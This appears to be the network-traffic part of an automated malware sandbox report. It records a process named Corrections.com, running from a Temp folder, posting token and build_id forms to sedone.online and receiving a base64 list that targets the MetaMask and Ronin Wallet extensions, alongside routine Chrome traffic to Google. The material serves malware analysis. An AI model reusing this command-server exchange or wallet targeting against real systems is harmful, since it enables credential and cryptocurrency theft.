                                                                                                                                                                                                                                                                                          2024-12-15 19:47:38 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------WL68Q90R9H47QI5FKFUKCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:39 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:39 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          6192.168.2.449745116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:40 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q1DJMYMYMYU3ECJMGDT
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 5961
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:40 UTC5961OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q1DJMYMYMYU3ECJMGDTCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          7192.168.2.449746116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:41 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q1DJMYMYMYU3ECJMGDT
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:41 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q1DJMYMYMYU3ECJMGDTCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:42 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          8192.168.2.449752142.250.181.1324431228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:45 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:46 GMT
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3GFPX0REayyTjaInFcHqfg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC124INData Raw: 38 31 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 61 6e 74 61 63 6f 6e 20 6e 79 63 20 62 61 72 20 63 72 61 77 6c 22 2c 22 6c 75 6b 65 20 61 6c 74 6d 79 65 72 22 2c 22 63 6f 72 79 78 6b 65 6e 73 68 69 6e 20 6d 61 6e 67 61 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 6c 65 61 6b 73 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77
                                                                                                                                                                                                                                                                                          Data Ascii: 815)]}'["",["santacon nyc bar crawl","luke altmyer","coryxkenshin manga","nintendo switch 2 leaks","weather forecast snow
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC1390INData Raw: 20 73 74 6f 72 6d 22 2c 22 64 65 63 65 6d 62 65 72 20 31 35 20 66 75 6c 6c 20 6d 6f 6f 6e 20 61 73 74 72 6f 6c 6f 67 79 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 6a 61 63 6b 70 6f 74 20 6c 6f 74 74 65 72 79 22 2c 22 6f 6c 69 76 65 72 20 77 61 68 6c 73 74 72 6f 6d 20 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: storm","december 15 full moon astrology","mega millions jackpot lottery","oliver wahlstrom boston bruins"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC562INData Raw: 6e 53 44 63 32 63 56 5a 36 62 30 6c 69 61 6c 4e 4f 51 6b 39 31 55 6a 46 56 4c 33 64 43 63 6d 56 43 4d 55 77 32 55 58 42 57 55 7a 42 7a 56 58 56 48 5a 57 31 4d 53 7a 42 55 4e 45 6c 51 55 47 74 53 4e 6a 5a 75 62 58 55 78 4e 6b 64 4a 56 32 78 30 56 6e 56 30 4e 31 52 58 61 55 4a 68 4d 6d 56 77 4d 30 49 79 57 54 64 7a 54 58 46 72 63 6a 46 49 4e 58 4e 69 64 6c 52 79 4e 47 46 69 63 6b 4e 77 61 6e 4d 35 53 6b 55 7a 4f 55 74 4e 55 6d 70 4a 4f 45 59 31 52 43 74 4f 54 46 6c 58 53 6c 70 57 57 6c 4e 54 4e 32 51 77 52 48 6c 49 54 46 52 6f 52 45 56 7a 52 56 4e 34 62 31 4e 52 64 6d 31 6c 5a 58 52 44 54 6e 6c 6f 65 58 6c 4c 51 56 68 6d 55 6d 38 77 59 57 39 56 53 7a 55 78 4d 57 51 78 55 56 70 6b 5a 32 38 34 65 57 4e 68 56 33 56 4c 54 30 70 74 64 45 34 77 62 32 4a 6d 52 58
                                                                                                                                                                                                                                                                                          Data Ascii: nSDc2cVZ6b0lialNOQk91UjFVL3dCcmVCMUw2UXBWUzBzVXVHZW1MSzBUNElQUGtSNjZubXUxNkdJV2x0VnV0N1RXaUJhMmVwM0IyWTdzTXFrcjFINXNidlRyNGFickNwanM5SkUzOUtNUmpJOEY1RCtOTFlXSlpWWlNTN2QwRHlITFRoREVzRVN4b1NRdm1lZXRDTnloeXlLQVhmUm8wYW9VSzUxMWQxUVpkZ284eWNhV3VLT0ptdE4wb2JmRX
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC90INData Raw: 35 34 0d 0a 58 51 57 74 59 4d 31 68 56 59 6e 56 6d 59 57 68 56 65 58 64 74 54 7a 45 77 51 33 64 4e 55 6d 64 54 65 6c 42 32 53 54 6c 73 51 58 68 75 4d 7a 42 6f 64 6c 55 78 51 6d 35 4f 56 54 42 36 4c 30 46 45 51 6d 5a 6d 4f 46 68 6a 5a 48 64 69 63 6d 35 51 62 6e 4a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 54XQWtYM1hVYnVmYWhVeXdtTzEwQ3dNUmdTelB2STlsQXhuMzBodlUxQm5OVTB6L0FEQmZmOFhjZHdicm5QbnJ
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC1311INData Raw: 35 31 38 0d 0a 7a 52 30 73 34 56 31 68 69 53 57 4e 75 53 56 6b 32 5a 7a 46 6d 56 30 39 71 56 57 51 33 53 30 78 36 65 45 4a 6b 53 33 4e 6d 54 7a 4e 58 63 58 46 4a 52 32 78 33 63 58 6c 72 54 6a 4e 57 51 6b 6f 31 61 31 6f 31 61 7a 51 77 4b 31 64 59 61 58 56 50 4e 47 4e 54 56 6d 78 72 61 31 64 4f 57 6a 52 73 59 56 4a 4f 63 44 5a 78 52 33 68 6e 4b 33 5a 71 63 45 46 74 59 56 70 45 52 30 39 52 59 54 5a 47 62 6a 63 72 56 6a 42 33 54 30 56 5a 5a 57 5a 4a 64 6e 4d 77 62 32 35 6b 5a 55 35 49 64 6d 35 48 62 6a 52 77 56 30 56 52 4d 47 31 34 62 31 6c 5a 4f 44 55 72 53 45 67 78 52 32 5a 56 62 6d 31 6d 5a 6a 41 77 4d 54 6c 76 62 6b 56 4f 62 48 5a 47 62 57 6f 72 56 48 56 4f 55 45 35 50 59 56 52 45 53 55 63 33 64 31 6c 5a 53 55 64 45 4e 6a 55 78 54 45 77 7a 53 6b 5a 4b 5a
                                                                                                                                                                                                                                                                                          Data Ascii: 518zR0s4V1hiSWNuSVk2ZzFmV09qVWQ3S0x6eEJkS3NmTzNXcXFJR2x3cXlrTjNWQko1a1o1azQwK1dYaXVPNGNTVmxra1dOWjRsYVJOcDZxR3hnK3ZqcEFtYVpER09RYTZGbjcrVjB3T0VZZWZJdnMwb25kZU5Idm5HbjRwV0VRMG14b1lZODUrSEgxR2ZVbm1mZjAwMTlvbkVObHZGbWorVHVOUE5PYVRESUc3d1lZSUdENjUxTEwzSkZKZ
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          9192.168.2.449753142.250.181.1324431228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:46 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 704583840
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:46 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC372INData Raw: 31 36 63 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                          Data Ascii: 16cd)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:47 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
